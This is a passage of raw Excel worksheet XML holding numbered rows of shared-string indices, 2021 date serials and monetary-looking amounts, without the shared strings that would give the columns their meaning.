        <v>3535</v>
      </c>
      <c r="D4422" t="s">
        <v>13612</v>
      </c>
      <c r="E4422">
        <v>27</v>
      </c>
      <c r="F4422" t="s">
        <v>2236</v>
      </c>
      <c r="G4422" s="1">
        <v>44378</v>
      </c>
      <c r="H4422">
        <v>300000</v>
      </c>
      <c r="J4422" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4423" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4423">
        <v>24990</v>
      </c>
      <c r="B4423">
        <v>5477</v>
      </c>
      <c r="C4423" t="s">
        <v>3535</v>
      </c>
      <c r="D4423" t="s">
        <v>13612</v>
      </c>
      <c r="E4423">
        <v>27</v>
      </c>
      <c r="F4423" t="s">
        <v>9900</v>
      </c>
      <c r="G4423" s="1">
        <v>44378</v>
      </c>
      <c r="H4423">
        <v>300000</v>
      </c>
      <c r="J4423" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="4424" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4424">
        <v>24991</v>
      </c>
      <c r="B4424">
        <v>5477</v>
      </c>
      <c r="C4424" t="s">
        <v>3535</v>
      </c>
      <c r="D4424" t="s">
        <v>13612</v>
      </c>
      <c r="E4424">
        <v>27</v>
      </c>
      <c r="F4424" t="s">
        <v>13614</v>
      </c>
      <c r="G4424" s="1">
        <v>44378</v>
      </c>
      <c r="H4424">
        <v>300000</v>
      </c>
    </row>
    <row r="4425" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4425">
        <v>24992</v>
      </c>
      <c r="B4425">
        <v>1953</v>
      </c>
      <c r="C4425" t="s">
        <v>16548</v>
      </c>
      <c r="D4425" t="s">
        <v>16549</v>
      </c>
      <c r="E4425">
        <v>12</v>
      </c>
      <c r="F4425" t="s">
        <v>9561</v>
      </c>
      <c r="G4425" s="1">
        <v>44327</v>
      </c>
      <c r="H4425" s="4">
        <v>800000</v>
      </c>
      <c r="I4425" t="s">
        <v>13616</v>
      </c>
      <c r="J4425" t="s">
        <v>13463</v>
      </c>
    </row>
    <row r="4426" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4426">
        <v>24993</v>
      </c>
      <c r="B4426">
        <v>1953</v>
      </c>
      <c r="C4426" t="s">
        <v>16548</v>
      </c>
      <c r="D4426" t="s">
        <v>16549</v>
      </c>
      <c r="E4426">
        <v>12</v>
      </c>
      <c r="F4426" t="s">
        <v>13617</v>
      </c>
      <c r="G4426" s="1">
        <v>44327</v>
      </c>
      <c r="H4426" s="4">
        <v>180000</v>
      </c>
      <c r="I4426" t="s">
        <v>9525</v>
      </c>
      <c r="J4426" t="s">
        <v>13463</v>
      </c>
    </row>
    <row r="4427" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4427">
        <v>24994</v>
      </c>
      <c r="B4427">
        <v>1953</v>
      </c>
      <c r="C4427" t="s">
        <v>16548</v>
      </c>
      <c r="D4427" t="s">
        <v>16549</v>
      </c>
      <c r="E4427">
        <v>12</v>
      </c>
      <c r="F4427" t="s">
        <v>13618</v>
      </c>
      <c r="G4427" s="1">
        <v>44327</v>
      </c>
      <c r="H4427" s="4">
        <v>50000</v>
      </c>
      <c r="I4427" t="s">
        <v>9525</v>
      </c>
      <c r="J4427" t="s">
        <v>13463</v>
      </c>
    </row>
    <row r="4428" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4428">
        <v>24995</v>
      </c>
      <c r="B4428">
        <v>1953</v>
      </c>
      <c r="C4428" t="s">
        <v>16548</v>
      </c>
      <c r="D4428" t="s">
        <v>16549</v>
      </c>
      <c r="E4428">
        <v>12</v>
      </c>
      <c r="F4428" t="s">
        <v>10130</v>
      </c>
      <c r="G4428" s="1">
        <v>44327</v>
      </c>
      <c r="H4428" s="4">
        <v>20000</v>
      </c>
      <c r="I4428" t="s">
        <v>9525</v>
      </c>
      <c r="J4428" t="s">
        <v>13463</v>
      </c>
    </row>
    <row r="4429" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4429">
        <v>24996</v>
      </c>
      <c r="B4429">
        <v>1953</v>
      </c>
      <c r="C4429" t="s">
        <v>16548</v>
      </c>
      <c r="D4429" t="s">
        <v>16549</v>
      </c>
      <c r="E4429">
        <v>12</v>
      </c>
      <c r="F4429" t="s">
        <v>9681</v>
      </c>
      <c r="G4429" s="1">
        <v>44327</v>
      </c>
      <c r="H4429" s="4">
        <v>20000</v>
      </c>
      <c r="I4429" t="s">
        <v>9525</v>
      </c>
      <c r="J4429" t="s">
        <v>13463</v>
      </c>
    </row>
    <row r="4430" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4430">
        <v>24997</v>
      </c>
      <c r="B4430">
        <v>1953</v>
      </c>
      <c r="C4430" t="s">
        <v>16548</v>
      </c>
      <c r="D4430" t="s">
        <v>16549</v>
      </c>
      <c r="E4430">
        <v>12</v>
      </c>
      <c r="F4430" t="s">
        <v>1746</v>
      </c>
      <c r="G4430" s="1">
        <v>44327</v>
      </c>
      <c r="H4430" s="4">
        <v>50000</v>
      </c>
      <c r="I4430" t="s">
        <v>9525</v>
      </c>
      <c r="J4430" t="s">
        <v>13463</v>
      </c>
    </row>
    <row r="4431" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4431">
        <v>24998</v>
      </c>
      <c r="B4431">
        <v>1953</v>
      </c>
      <c r="C4431" t="s">
        <v>6439</v>
      </c>
      <c r="D4431" t="s">
        <v>13615</v>
      </c>
      <c r="E4431">
        <v>12</v>
      </c>
      <c r="F4431" t="s">
        <v>9435</v>
      </c>
      <c r="G4431" s="1">
        <v>44327</v>
      </c>
      <c r="H4431">
        <v>0</v>
      </c>
      <c r="I4431" t="s">
        <v>9525</v>
      </c>
      <c r="J4431" t="s">
        <v>13463</v>
      </c>
    </row>
    <row r="4432" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4432">
        <v>24999</v>
      </c>
      <c r="B4432">
        <v>1953</v>
      </c>
      <c r="C4432" t="s">
        <v>6439</v>
      </c>
      <c r="D4432" t="s">
        <v>13615</v>
      </c>
      <c r="E4432">
        <v>12</v>
      </c>
      <c r="F4432" t="s">
        <v>10577</v>
      </c>
      <c r="G4432" s="1">
        <v>44327</v>
      </c>
      <c r="H4432">
        <v>0</v>
      </c>
      <c r="I4432" t="s">
        <v>9525</v>
      </c>
      <c r="J4432" t="s">
        <v>13463</v>
      </c>
    </row>
    <row r="4433" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4433">
        <v>25000</v>
      </c>
      <c r="B4433">
        <v>1953</v>
      </c>
      <c r="C4433" t="s">
        <v>16548</v>
      </c>
      <c r="D4433" t="s">
        <v>16549</v>
      </c>
      <c r="E4433">
        <v>12</v>
      </c>
      <c r="F4433" t="s">
        <v>9925</v>
      </c>
      <c r="G4433" s="1">
        <v>44327</v>
      </c>
      <c r="H4433" s="4">
        <v>500000</v>
      </c>
      <c r="I4433" t="s">
        <v>9525</v>
      </c>
      <c r="J4433" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="4434" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4434">
        <v>25001</v>
      </c>
      <c r="B4434">
        <v>2129</v>
      </c>
      <c r="C4434" t="s">
        <v>6502</v>
      </c>
      <c r="D4434" t="s">
        <v>13619</v>
      </c>
      <c r="E4434">
        <v>29</v>
      </c>
      <c r="F4434" t="s">
        <v>6504</v>
      </c>
      <c r="G4434" s="1">
        <v>44343</v>
      </c>
      <c r="H4434">
        <v>900000</v>
      </c>
      <c r="I4434" t="s">
        <v>13620</v>
      </c>
      <c r="J4434" t="s">
        <v>10018</v>
      </c>
    </row>
    <row r="4435" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4435">
        <v>25002</v>
      </c>
      <c r="B4435">
        <v>5330</v>
      </c>
      <c r="C4435" t="s">
        <v>8768</v>
      </c>
      <c r="D4435" t="s">
        <v>13621</v>
      </c>
      <c r="E4435">
        <v>10</v>
      </c>
      <c r="F4435" t="s">
        <v>764</v>
      </c>
      <c r="G4435" s="1">
        <v>44298</v>
      </c>
      <c r="H4435">
        <v>400</v>
      </c>
      <c r="I4435" t="s">
        <v>9870</v>
      </c>
    </row>
    <row r="4436" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4436">
        <v>25003</v>
      </c>
      <c r="B4436">
        <v>5330</v>
      </c>
      <c r="C4436" t="s">
        <v>8768</v>
      </c>
      <c r="D4436" t="s">
        <v>13621</v>
      </c>
      <c r="E4436">
        <v>10</v>
      </c>
      <c r="F4436" t="s">
        <v>12318</v>
      </c>
      <c r="G4436" s="1">
        <v>44298</v>
      </c>
      <c r="H4436">
        <v>1200</v>
      </c>
      <c r="I4436" t="s">
        <v>13622</v>
      </c>
    </row>
    <row r="4437" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4437">
        <v>25004</v>
      </c>
      <c r="B4437">
        <v>162</v>
      </c>
      <c r="C4437" t="s">
        <v>2380</v>
      </c>
      <c r="D4437" t="s">
        <v>13623</v>
      </c>
      <c r="E4437">
        <v>13</v>
      </c>
      <c r="F4437" t="s">
        <v>2382</v>
      </c>
      <c r="G4437" s="1">
        <v>44341</v>
      </c>
      <c r="H4437">
        <v>100000</v>
      </c>
      <c r="I4437" t="s">
        <v>9571</v>
      </c>
    </row>
    <row r="4438" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4438">
        <v>25008</v>
      </c>
      <c r="B4438">
        <v>5314</v>
      </c>
      <c r="C4438" t="s">
        <v>8852</v>
      </c>
      <c r="D4438" t="s">
        <v>13624</v>
      </c>
      <c r="E4438">
        <v>2</v>
      </c>
      <c r="F4438" t="s">
        <v>13625</v>
      </c>
      <c r="G4438" s="1">
        <v>44358</v>
      </c>
      <c r="H4438">
        <v>250000</v>
      </c>
      <c r="I4438" t="s">
        <v>13626</v>
      </c>
      <c r="J4438" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="4439" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4439">
        <v>25009</v>
      </c>
      <c r="B4439">
        <v>5314</v>
      </c>
      <c r="C4439" t="s">
        <v>8852</v>
      </c>
      <c r="D4439" t="s">
        <v>13624</v>
      </c>
      <c r="E4439">
        <v>2</v>
      </c>
      <c r="F4439" t="s">
        <v>13627</v>
      </c>
      <c r="G4439" s="1">
        <v>44358</v>
      </c>
      <c r="H4439">
        <v>2500000</v>
      </c>
      <c r="I4439" t="s">
        <v>13626</v>
      </c>
      <c r="J4439" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="4440" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4440">
        <v>25010</v>
      </c>
      <c r="B4440">
        <v>5314</v>
      </c>
      <c r="C4440" t="s">
        <v>8852</v>
      </c>
      <c r="D4440" t="s">
        <v>13624</v>
      </c>
      <c r="E4440">
        <v>2</v>
      </c>
      <c r="F4440" t="s">
        <v>12841</v>
      </c>
      <c r="G4440" s="1">
        <v>44358</v>
      </c>
      <c r="H4440">
        <v>1500000</v>
      </c>
      <c r="I4440" t="s">
        <v>13626</v>
      </c>
      <c r="J4440" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="4441" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4441">
        <v>25011</v>
      </c>
      <c r="B4441">
        <v>5314</v>
      </c>
      <c r="C4441" t="s">
        <v>8852</v>
      </c>
      <c r="D4441" t="s">
        <v>13624</v>
      </c>
      <c r="E4441">
        <v>2</v>
      </c>
      <c r="F4441" t="s">
        <v>2236</v>
      </c>
      <c r="G4441" s="1">
        <v>44358</v>
      </c>
      <c r="H4441">
        <v>2500000</v>
      </c>
      <c r="I4441" t="s">
        <v>13626</v>
      </c>
      <c r="J4441" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="4442" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4442">
        <v>25012</v>
      </c>
      <c r="B4442">
        <v>1270</v>
      </c>
      <c r="C4442" t="s">
        <v>2828</v>
      </c>
      <c r="D4442" t="s">
        <v>13628</v>
      </c>
      <c r="E4442">
        <v>13</v>
      </c>
      <c r="F4442" t="s">
        <v>13629</v>
      </c>
      <c r="G4442" s="1">
        <v>44347</v>
      </c>
      <c r="H4442">
        <v>100000</v>
      </c>
      <c r="I4442" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4443" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4443">
        <v>25013</v>
      </c>
      <c r="B4443">
        <v>1270</v>
      </c>
      <c r="C4443" t="s">
        <v>2828</v>
      </c>
      <c r="D4443" t="s">
        <v>13628</v>
      </c>
      <c r="E4443">
        <v>13</v>
      </c>
      <c r="F4443" t="s">
        <v>13630</v>
      </c>
      <c r="G4443" s="1">
        <v>44347</v>
      </c>
      <c r="H4443">
        <v>100000</v>
      </c>
      <c r="I4443" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4444" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4444">
        <v>25014</v>
      </c>
      <c r="B4444">
        <v>1270</v>
      </c>
      <c r="C4444" t="s">
        <v>2828</v>
      </c>
      <c r="D4444" t="s">
        <v>13628</v>
      </c>
      <c r="E4444">
        <v>13</v>
      </c>
      <c r="F4444" t="s">
        <v>13631</v>
      </c>
      <c r="G4444" s="1">
        <v>44347</v>
      </c>
      <c r="H4444">
        <v>100000</v>
      </c>
      <c r="I4444" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4445" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4445">
        <v>25015</v>
      </c>
      <c r="B4445">
        <v>1270</v>
      </c>
      <c r="C4445" t="s">
        <v>2828</v>
      </c>
      <c r="D4445" t="s">
        <v>13628</v>
      </c>
      <c r="E4445">
        <v>13</v>
      </c>
      <c r="F4445" t="s">
        <v>13632</v>
      </c>
      <c r="G4445" s="1">
        <v>44347</v>
      </c>
      <c r="H4445">
        <v>100000</v>
      </c>
      <c r="I4445" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4446" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4446">
        <v>25016</v>
      </c>
      <c r="B4446">
        <v>1270</v>
      </c>
      <c r="C4446" t="s">
        <v>2828</v>
      </c>
      <c r="D4446" t="s">
        <v>13628</v>
      </c>
      <c r="E4446">
        <v>13</v>
      </c>
      <c r="F4446" t="s">
        <v>10463</v>
      </c>
      <c r="G4446" s="1">
        <v>44347</v>
      </c>
      <c r="H4446">
        <v>100000</v>
      </c>
      <c r="I4446" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4447" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4447">
        <v>25017</v>
      </c>
      <c r="B4447">
        <v>1270</v>
      </c>
      <c r="C4447" t="s">
        <v>2828</v>
      </c>
      <c r="D4447" t="s">
        <v>13628</v>
      </c>
      <c r="E4447">
        <v>13</v>
      </c>
      <c r="F4447" t="s">
        <v>9641</v>
      </c>
      <c r="G4447" s="1">
        <v>44347</v>
      </c>
      <c r="H4447">
        <v>100000</v>
      </c>
      <c r="I4447" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4448" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4448">
        <v>25018</v>
      </c>
      <c r="B4448">
        <v>1270</v>
      </c>
      <c r="C4448" t="s">
        <v>2828</v>
      </c>
      <c r="D4448" t="s">
        <v>13628</v>
      </c>
      <c r="E4448">
        <v>13</v>
      </c>
      <c r="F4448" t="s">
        <v>2236</v>
      </c>
      <c r="G4448" s="1">
        <v>44347</v>
      </c>
      <c r="H4448">
        <v>100000</v>
      </c>
      <c r="I4448" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4449" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A4449">
        <v>25019</v>
      </c>
      <c r="B4449">
        <v>1270</v>
      </c>
      <c r="C4449" t="s">
        <v>2828</v>
      </c>
      <c r="D4449" t="s">
        <v>13628</v>
      </c>
      <c r="E4449">
        <v>13</v>
      </c>
      <c r="F4449" t="s">
        <v>4686</v>
      </c>
      <c r="G4449" s="1">
        <v>44347</v>
      </c>
      <c r="H4449">
        <v>100000</v>
      </c>
      <c r="I4449" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4450" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A4450">
        <v>25020</v>
      </c>
      <c r="B4450">
        <v>1270</v>
      </c>
      <c r="C4450" t="s">
        <v>2828</v>
      </c>
      <c r="D4450" t="s">
        <v>13628</v>
      </c>
      <c r="E4450">
        <v>13</v>
      </c>
      <c r="F4450" t="s">
        <v>1746</v>
      </c>
      <c r="G4450" s="1">
        <v>44347</v>
      </c>
      <c r="H4450">
        <v>100000</v>
      </c>
      <c r="I4450" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4451" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A4451">
        <v>25021</v>
      </c>
      <c r="B4451">
        <v>1270</v>
      </c>
      <c r="C4451" t="s">
        <v>2828</v>
      </c>
      <c r="D4451" t="s">
        <v>13628</v>
      </c>
      <c r="E4451">
        <v>13</v>
      </c>
      <c r="F4451" t="s">
        <v>3814</v>
      </c>
      <c r="G4451" s="1">
        <v>44347</v>
      </c>
      <c r="H4451">
        <v>100000</v>
      </c>
      <c r="I4451" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4452" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A4452">
        <v>25022</v>
      </c>
      <c r="B4452">
        <v>1270</v>
      </c>
      <c r="C4452" t="s">
        <v>2828</v>
      </c>
      <c r="D4452" t="s">
        <v>13628</v>
      </c>
      <c r="E4452">
        <v>13</v>
      </c>
      <c r="F4452" t="s">
        <v>9925</v>
      </c>
      <c r="G4452" s="1">
        <v>44347</v>
      </c>
      <c r="H4452">
        <v>100</v>
      </c>
      <c r="I4452" t="s">
        <v>13633</v>
      </c>
    </row>
    <row r="4453" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A4453">
        <v>25023</v>
      </c>
      <c r="B4453">
        <v>1270</v>
      </c>
      <c r="C4453" t="s">
        <v>2828</v>
      </c>
      <c r="D4453" t="s">
        <v>13628</v>
      </c>
      <c r="E4453">
        <v>13</v>
      </c>
      <c r="F4453" t="s">
        <v>7296</v>
      </c>
      <c r="G4453" s="1">
        <v>44347</v>
      </c>
      <c r="H4453">
        <v>100</v>
      </c>
      <c r="I4453" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4454" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A4454">
        <v>25041</v>
      </c>
      <c r="B4454">
        <v>1170</v>
      </c>
      <c r="C4454" t="s">
        <v>3921</v>
      </c>
      <c r="D4454" t="s">
        <v>13634</v>
      </c>
      <c r="E4454">
        <v>13</v>
      </c>
      <c r="F4454" t="s">
        <v>13629</v>
      </c>
      <c r="G4454" s="1">
        <v>44347</v>
      </c>
      <c r="H4454">
        <v>100000</v>
      </c>
      <c r="I4454" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4455" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A4455">
        <v>25042</v>
      </c>
      <c r="B4455">
        <v>1170</v>
      </c>
      <c r="C4455" t="s">
        <v>3921</v>
      </c>
      <c r="D4455" t="s">
        <v>13634</v>
      </c>
      <c r="E4455">
        <v>13</v>
      </c>
      <c r="F4455" t="s">
        <v>13635</v>
      </c>
      <c r="G4455" s="1">
        <v>44347</v>
      </c>
      <c r="H4455">
        <v>100000</v>
      </c>
      <c r="I4455" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4456" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A4456">
        <v>25043</v>
      </c>
      <c r="B4456">
        <v>1170</v>
      </c>
      <c r="C4456" t="s">
        <v>3921</v>
      </c>
      <c r="D4456" t="s">
        <v>13634</v>
      </c>
      <c r="E4456">
        <v>13</v>
      </c>
      <c r="F4456" t="s">
        <v>13636</v>
      </c>
      <c r="G4456" s="1">
        <v>44347</v>
      </c>
      <c r="H4456">
        <v>100000</v>
      </c>
      <c r="I4456" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4457" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A4457">
        <v>25044</v>
      </c>
      <c r="B4457">
        <v>1170</v>
      </c>
      <c r="C4457" t="s">
        <v>3921</v>
      </c>
      <c r="D4457" t="s">
        <v>13634</v>
      </c>
      <c r="E4457">
        <v>13</v>
      </c>
      <c r="F4457" t="s">
        <v>13637</v>
      </c>
      <c r="G4457" s="1">
        <v>44347</v>
      </c>
      <c r="H4457">
        <v>100000</v>
      </c>
      <c r="I4457" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4458" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A4458">
        <v>25045</v>
      </c>
      <c r="B4458">
        <v>1170</v>
      </c>
      <c r="C4458" t="s">
        <v>3921</v>
      </c>
      <c r="D4458" t="s">
        <v>13634</v>
      </c>
      <c r="E4458">
        <v>13</v>
      </c>
      <c r="F4458" t="s">
        <v>9561</v>
      </c>
      <c r="G4458" s="1">
        <v>44347</v>
      </c>
      <c r="H4458">
        <v>100000</v>
      </c>
      <c r="I4458" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4459" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A4459">
        <v>25046</v>
      </c>
      <c r="B4459">
        <v>1170</v>
      </c>
      <c r="C4459" t="s">
        <v>3921</v>
      </c>
      <c r="D4459" t="s">
        <v>13634</v>
      </c>
      <c r="E4459">
        <v>13</v>
      </c>
      <c r="F4459" t="s">
        <v>9676</v>
      </c>
      <c r="G4459" s="1">
        <v>44347</v>
      </c>
      <c r="H4459">
        <v>100000</v>
      </c>
      <c r="I4459" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4460" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A4460">
        <v>25047</v>
      </c>
      <c r="B4460">
        <v>1170</v>
      </c>
      <c r="C4460" t="s">
        <v>3921</v>
      </c>
      <c r="D4460" t="s">
        <v>13634</v>
      </c>
      <c r="E4460">
        <v>13</v>
      </c>
      <c r="F4460" t="s">
        <v>2236</v>
      </c>
      <c r="G4460" s="1">
        <v>44347</v>
      </c>
      <c r="H4460">
        <v>100000</v>
      </c>
      <c r="I4460" t="s">
        <v>10029</v>
      </c>
    </row>
    <row r="4461" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A4461">
        <v>25048</v>
      </c>
      <c r="B4461">
        <v>1170</v>
      </c>
      <c r="C4461" t="s">
        <v>3921</v>
      </c>
      <c r="D4461" t="s">
        <v>13634</v>
      </c>
      <c r="E4461">
        <v>13</v>
      </c>
      <c r="F4461" t="s">
        <v>4686</v>
      </c>
      <c r="G4461" s="1">
        <v>44347</v>
      </c>
      <c r="H4461">
        <v>100000</v>
      </c>
      <c r="I4461" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4462" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A4462">
        <v>25049</v>
      </c>
      <c r="B4462">
        <v>1170</v>
      </c>
      <c r="C4462" t="s">
        <v>3921</v>
      </c>
      <c r="D4462" t="s">
        <v>13634</v>
      </c>
      <c r="E4462">
        <v>13</v>
      </c>
      <c r="F4462" t="s">
        <v>3814</v>
      </c>
      <c r="G4462" s="1">
        <v>44347</v>
      </c>
      <c r="H4462">
        <v>100000</v>
      </c>
      <c r="I4462" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4463" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A4463">
        <v>25050</v>
      </c>
      <c r="B4463">
        <v>1170</v>
      </c>
      <c r="C4463" t="s">
        <v>3921</v>
      </c>
      <c r="D4463" t="s">
        <v>13634</v>
      </c>
      <c r="E4463">
        <v>13</v>
      </c>
      <c r="F4463" t="s">
        <v>1746</v>
      </c>
      <c r="G4463" s="1">
        <v>44347</v>
      </c>
      <c r="H4463">
        <v>100000</v>
      </c>
      <c r="I4463" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4464" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A4464">
        <v>25051</v>
      </c>
      <c r="B4464">
        <v>1170</v>
      </c>
      <c r="C4464" t="s">
        <v>3921</v>
      </c>
      <c r="D4464" t="s">
        <v>13634</v>
      </c>
      <c r="E4464">
        <v>13</v>
      </c>
      <c r="F4464" t="s">
        <v>9925</v>
      </c>
      <c r="G4464" s="1">
        <v>44347</v>
      </c>
      <c r="H4464">
        <v>100</v>
      </c>
      <c r="I4464" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4465" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4465">
        <v>25052</v>
      </c>
      <c r="B4465">
        <v>1170</v>
      </c>
      <c r="C4465" t="s">
        <v>3921</v>
      </c>
      <c r="D4465" t="s">
        <v>13634</v>
      </c>
      <c r="E4465">
        <v>13</v>
      </c>
      <c r="F4465" t="s">
        <v>7296</v>
      </c>
      <c r="G4465" s="1">
        <v>44347</v>
      </c>
      <c r="H4465">
        <v>100</v>
      </c>
      <c r="I4465" t="s">
        <v>10267</v>
      </c>
    </row>
    <row r="4466" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4466">
        <v>25053</v>
      </c>
      <c r="B4466">
        <v>5540</v>
      </c>
      <c r="C4466" t="s">
        <v>8986</v>
      </c>
      <c r="D4466" t="s">
        <v>13638</v>
      </c>
      <c r="E4466">
        <v>12</v>
      </c>
      <c r="F4466" t="s">
        <v>764</v>
      </c>
      <c r="G4466" s="1">
        <v>44312</v>
      </c>
      <c r="H4466">
        <v>1500000</v>
      </c>
      <c r="I4466" t="s">
        <v>13639</v>
      </c>
    </row>
    <row r="4467" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4467">
        <v>25054</v>
      </c>
      <c r="B4467">
        <v>5570</v>
      </c>
      <c r="C4467" t="s">
        <v>8980</v>
      </c>
      <c r="D4467" t="s">
        <v>13640</v>
      </c>
      <c r="E4467">
        <v>26</v>
      </c>
      <c r="F4467" t="s">
        <v>9900</v>
      </c>
      <c r="G4467" s="1">
        <v>44358</v>
      </c>
      <c r="H4467">
        <v>90000</v>
      </c>
      <c r="I4467" t="s">
        <v>13641</v>
      </c>
    </row>
    <row r="4468" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4468">
        <v>25055</v>
      </c>
      <c r="B4468">
        <v>1842</v>
      </c>
      <c r="C4468" t="s">
        <v>6511</v>
      </c>
      <c r="D4468" t="s">
        <v>13642</v>
      </c>
      <c r="E4468">
        <v>16</v>
      </c>
      <c r="F4468" t="s">
        <v>6513</v>
      </c>
      <c r="G4468" s="1">
        <v>44323</v>
      </c>
      <c r="H4468">
        <v>60000</v>
      </c>
      <c r="J4468" t="s">
        <v>9810</v>
      </c>
    </row>
    <row r="4469" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4469">
        <v>25060</v>
      </c>
      <c r="B4469">
        <v>1559</v>
      </c>
      <c r="C4469" t="s">
        <v>4549</v>
      </c>
      <c r="D4469" t="s">
        <v>13643</v>
      </c>
      <c r="E4469">
        <v>6</v>
      </c>
      <c r="F4469" t="s">
        <v>13644</v>
      </c>
      <c r="G4469" s="1">
        <v>44312</v>
      </c>
      <c r="H4469">
        <v>10000</v>
      </c>
      <c r="I4469" t="s">
        <v>9852</v>
      </c>
      <c r="J4469" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="4470" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4470">
        <v>25061</v>
      </c>
      <c r="B4470">
        <v>1559</v>
      </c>
      <c r="C4470" t="s">
        <v>4549</v>
      </c>
      <c r="D4470" t="s">
        <v>13643</v>
      </c>
      <c r="E4470">
        <v>6</v>
      </c>
      <c r="F4470" t="s">
        <v>13645</v>
      </c>
      <c r="G4470" s="1">
        <v>44312</v>
      </c>
      <c r="H4470">
        <v>13200</v>
      </c>
      <c r="I4470" t="s">
        <v>9852</v>
      </c>
      <c r="J4470" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="4471" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4471">
        <v>25062</v>
      </c>
      <c r="B4471">
        <v>1559</v>
      </c>
      <c r="C4471" t="s">
        <v>4549</v>
      </c>
      <c r="D4471" t="s">
        <v>13643</v>
      </c>
      <c r="E4471">
        <v>6</v>
      </c>
      <c r="F4471" t="s">
        <v>6569</v>
      </c>
      <c r="G4471" s="1">
        <v>44313</v>
      </c>
      <c r="H4471">
        <v>10000</v>
      </c>
      <c r="I4471" t="s">
        <v>9852</v>
      </c>
      <c r="J4471" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="4472" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4472">
        <v>25078</v>
      </c>
      <c r="B4472">
        <v>5483</v>
      </c>
      <c r="C4472" t="s">
        <v>8763</v>
      </c>
      <c r="D4472" t="s">
        <v>13646</v>
      </c>
      <c r="E4472">
        <v>5</v>
      </c>
      <c r="F4472" t="s">
        <v>13647</v>
      </c>
      <c r="G4472" s="1">
        <v>44327</v>
      </c>
      <c r="H4472">
        <v>30000</v>
      </c>
      <c r="I4472" t="s">
        <v>13648</v>
      </c>
      <c r="J4472" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4473" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4473">
        <v>25079</v>
      </c>
      <c r="B4473">
        <v>5483</v>
      </c>
      <c r="C4473" t="s">
        <v>8763</v>
      </c>
      <c r="D4473" t="s">
        <v>13646</v>
      </c>
      <c r="E4473">
        <v>5</v>
      </c>
      <c r="F4473" t="s">
        <v>13649</v>
      </c>
      <c r="G4473" s="1">
        <v>44327</v>
      </c>
      <c r="H4473">
        <v>1000</v>
      </c>
      <c r="I4473" t="s">
        <v>13648</v>
      </c>
      <c r="J4473" t="s">
        <v>9639</v>
